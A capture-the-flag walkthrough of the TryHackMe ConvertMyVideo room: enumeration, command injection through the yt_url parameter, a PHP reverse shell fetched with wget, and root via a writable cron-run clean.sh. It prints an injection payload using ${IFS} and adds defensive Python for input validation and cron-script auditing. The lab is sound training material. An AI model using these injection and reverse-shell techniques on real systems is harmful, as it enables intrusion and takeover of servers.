# ConvertMyVideo

{% embed url="<https://tryhackme.com/room/convertmyvideo>" %}

## Enumeration

### nmap

```bash
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 65:1b:fc:74:10:39:df:dd:d0:2d:f0:53:1c:eb:6d:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1FkWVdXpiZN4JOheh/PVSTjXUgnhMNTFvHNzlip8x6vsFTwIwtP0+5xlYGjtLorEAS0KpJLtpzFO4p4PvEzMC40SY8E+i4LaiXHcMsJrbhIozUjZssBnbfgYPiwCzMICKygDSfG83zCC/ZiXeJKWfVEvpCVX1g5Al16mzQQnB3qPyz8TmSQ+Kgy7GRc+nnPvPbAdh8meVGcSl9bzGuXoFFEAH5RS8D92JpWDRuTVqCXGxZ4t4WgboFPncvau07A3Kl8BoeE8kDa3DUbPYyn3gwJd55khaJSxkKKlAB/f98zXfQnU0RQbiAlC88jD2TmK8ovd2IGmtqbuenHcNT01D
|   256 c4:28:04:a5:c3:b9:6a:95:5a:4d:7a:6e:46:e2:14:db (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI3zR5EsH+zXjBa4GNOE8Vlf04UROD9GrpAgx0mRcrDQvUdmaF0hYse2KixpRS8Pu1qhWKVRP7nz0LX5nbzb4i4=
|   256 ba:07:bb:cd:42:4a:f2:93:d1:05:d0:b3:4c:b1:d9:b1 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBKsS7+8A3OfoY8qtnKrVrjFss8LQhVeMqXeDnESa6Do
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.29 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
```

### Directory Search

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -u http://10.10.115.14/FUZZ -ic
Return:
images                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 412ms]
                        [Status: 200, Size: 747, Words: 154, Lines: 20, Duration: 5068ms]
admin                   [Status: 401, Size: 459, Words: 42, Lines: 15, Duration: 414ms]
js                      [Status: 301, Size: 309, Words: 20, Lines: 10, Duration: 411ms]
tmp                     [Status: 301, Size: 310, Words: 20, Lines: 10, Duration: 414ms]
```

When we try to access the admin directory, it prompts us with a login form.

### Web page (port 80)

![](/files/r8YUy70dibfSjvm3UBoS)

So we can see a place to put the ID and a convert button.

#### Convert function

I tried to put the ID in and convert, but it turns out it does nothing. When I captured the request, it showed this:

<figure><img src="/files/CPe3C3vAvaTzjMlM8DnT" alt=""><figcaption><p>discovered parameter in burpsuite</p></figcaption></figure>

So the button won’t convert anything, cuz I waited like a couple of minutes, but when I left it blank it returned the error code:

<figure><img src="/files/DLDPvvQNQuIMHfQAswgX" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/3KS7KaDlJ6NnDhU1RFih" alt=""><figcaption></figcaption></figure>

I tried to use localhost and dump out the content of the admin directory.

Since it only accepts URLs, I even tried using `file:///PATH/TO/THE/FILE`, and it turns out it didn’t work.

<figure><img src="/files/WTjKIgKFZwJ5Rdxnt2PI" alt=""><figcaption></figcaption></figure>

I wanted to test if this parameter is actually doing anything, so I opened up my netcat session, then put the link and port as the value, and it actually does interact with external links.

<figure><img src="/files/1YrOM9t3GcdCPZwLtiAj" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/YVQdCxHPCQTlyFajYKMX" alt=""><figcaption><p>netcat session</p></figcaption></figure>

### sqlmap (Failed)

So we confirmed it’s actually checking the URLs and it just returns error messages, so we are going to see if we can do anything with the parameter. Here I was thinking about whether we can do any SQLi.

```bash
sqlmap -r request.txt -p yt_url --prefix="http://example.com/?q=" --suffix="%23" --dbs --batch --technique=EU --risk=3 --level=5
```

Turns out it’s not working so let’s just see what’s up with the admin directory

### Admin directory

Once we go to the page, it pops up a login form.

<figure><img src="/files/vRN76rSdIDfiM6AXmxKk" alt=""><figcaption><p>login form</p></figcaption></figure>

<figure><img src="/files/vPnu2e0dZBvkeUNw7rMV" alt=""><figcaption></figcaption></figure>

It gives us an unauthorized message when we cancel the sign-in form.

Tell you what, these all return 401, but they are confirmed to be there: `http://<ip>/admin/.htaccess` and `http://<ip>/admin/.htpasswd`.

I also checked the headers of this page, but there’s nothing interesting.

### Command Injection

<https://github.com/payloadbox/command-injection-payload-list>

Wait, I just realized that we haven’t tried the easiest method yet: command injection.

Turns out it’s just a simple command injection….

<figure><img src="/files/Lc8sy55NQKYoLSGlEexM" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/9XRSJxVr5Ch9hPabZrGI" alt=""><figcaption></figcaption></figure>
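
On the defensive side, the fix for this class of bug is to validate `yt_url` strictly and never hand it to a shell. The sketch below is an added example, not code from the room or the original page; the host allowlist, the 11-character ID rule and the `video-converter` binary name are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the converter is only ever meant to fetch YouTube videos.
ALLOWED_HOSTS = {"www.youtube.com", "youtube.com", "youtu.be"}
VIDEO_ID = re.compile(r"[A-Za-z0-9_-]{11}")


def canonical_video_url(yt_url):
    """Return a URL rebuilt from a validated video ID, or raise ValueError."""
    parts = urlsplit(yt_url)
    if parts.scheme not in ("http", "https"):
        raise ValueError("scheme not allowed")
    if parts.hostname not in ALLOWED_HOSTS:
        raise ValueError("host not allowed")
    if parts.hostname == "youtu.be":
        video_id = parts.path.lstrip("/")
    else:
        video_id = parse_qs(parts.query).get("v", [""])[0]
    if not VIDEO_ID.fullmatch(video_id):
        raise ValueError("bad video id")
    # Only the 11-character ID survives; nothing else from the request is reused.
    return "https://www.youtube.com/watch?v=" + video_id


def converter_argv(yt_url):
    """Argument vector for subprocess.run(argv), i.e. with no shell involved."""
    # "video-converter" is a hypothetical binary name; "--" ends option parsing.
    return ["video-converter", "--", canonical_video_url(yt_url)]


def is_rejected(value):
    """True when the value would never reach the converter."""
    try:
        canonical_video_url(value)
    except ValueError:
        return True
    return False


# Constructed sample inputs, modelled on the values tried in this walkthrough.
SAMPLES = [
    "https://www.youtube.com/watch?v=abcDEF12345",  # ordinary request
    ";php${IFS}php-reverse-shell.php;",             # shell metacharacters
    "file:///PATH/TO/THE/FILE",                     # non-HTTP scheme
    "http://192.0.2.10:4444/",                      # arbitrary external host
]
VERDICTS = [is_rejected(s) for s in SAMPLES]
```
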

### Reverse shell

<https://github.com/pentestmonkey/php-reverse-shell>

Cool, so we have command injection and now we can get a reverse shell with this

We’re using `wget` and a php reverse shell, so get your php file ready

If you are wondering why we add `${IFS}` to the payload: the shell expands it to whitespace, so it basically works as a space. See more at <https://en.wikipedia.org/wiki/Input_Field_Separators>

<figure><img src="/files/9TraBiJjcGQ5aocVPWwL" alt=""><figcaption></figcaption></figure>

Once it’s uploaded to the server, we can run a simple command to invoke the payload:

```bash
yt_url=;php${IFS}php-reverse-shell.php;
```

To get the first flag, navigate to the admin directory, which is `/var/www/html/admin`, and you will see the file!

The previous `.htaccess` and `.htpasswd` are here for us as well!

<figure><img src="/files/RKqpIU1ctz9IQv66NtUG" alt=""><figcaption></figcaption></figure>

Remember the `tmp` dir that is also forbidden to us? Let’s take a look at what’s inside, since `sudo -l` and the `SUID` search found nothing.

<figure><img src="/files/e2xchL5CszsBGJ5PPDbk" alt=""><figcaption></figcaption></figure>

<div data-full-width="false"><figure><img src="/files/sFfoh8TovXPKuBYCenLZ" alt=""><figcaption></figcaption></figure></div>

### Privilege escalation

<https://chmod-calculator.com/>

This file seems to be executing routinely, so we can actually change the payload.

Pro tip: in CTFs, most `clean.sh` scripts run routinely, as do `maintenance.sh`, `tmp_clear.sh`, etc.

<figure><img src="/files/oYHIQdojkkcdnVIwwHes" alt=""><figcaption></figcaption></figure>

So I just did another reverse shell, and this time I changed the permissions so that when it returns we will get root privileges.

You can use the chmod calculator to work out the permission value you need.

<figure><img src="/files/cAPr2LHRpnq6UFkFbIRC" alt=""><figcaption></figcaption></figure>
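
The condition abused here is a script that a privileged scheduler runs while a less-privileged account can modify it. The audit below is an added example, not part of the original walkthrough: it flags every path component of such a script that is owned by or writable for an untrusted user. The directory layout in `demo()` is constructed, and the current user stands in for root so it runs unprivileged.

```python
import os
import stat
import tempfile


def risky_components(script, trusted_uids=frozenset({0}), root="/"):
    """List (path, reason) for the script and each parent up to root that an
    untrusted account could modify, and so change what the scheduled job runs."""
    findings = []
    path = os.path.realpath(script)
    root = os.path.realpath(root)
    while True:
        st = os.stat(path)
        if st.st_uid not in trusted_uids:
            findings.append((path, "owned by uid %d" % st.st_uid))
        # A sticky directory (like /tmp) stops others replacing files they do not own.
        sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH) and not sticky_dir:
            mode = stat.filemode(st.st_mode)
            findings.append((path, "group/other writable (%s)" % mode))
        if path == root or path == os.path.dirname(path):
            break
        path = os.path.dirname(path)
    return findings


def demo():
    """Constructed layout: a job script left mode 0777 in a web-served tmp dir."""
    me = {os.getuid()}  # stand-in for root in this unprivileged demo
    with tempfile.TemporaryDirectory() as base:
        webtmp = os.path.join(base, "tmp")
        os.mkdir(webtmp)
        os.chmod(webtmp, 0o755)
        script = os.path.join(webtmp, "clean.sh")
        with open(script, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(script, 0o777)
        before = [reason for _, reason in risky_components(script, me, base)]
        os.chmod(script, 0o755)  # the fix: only the owner may write
        after = risky_components(script, me, base)
    return before, after
```

On a real host, call `risky_components()` with the default `trusted_uids` on every script referenced from root's crontab and the system cron directories.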


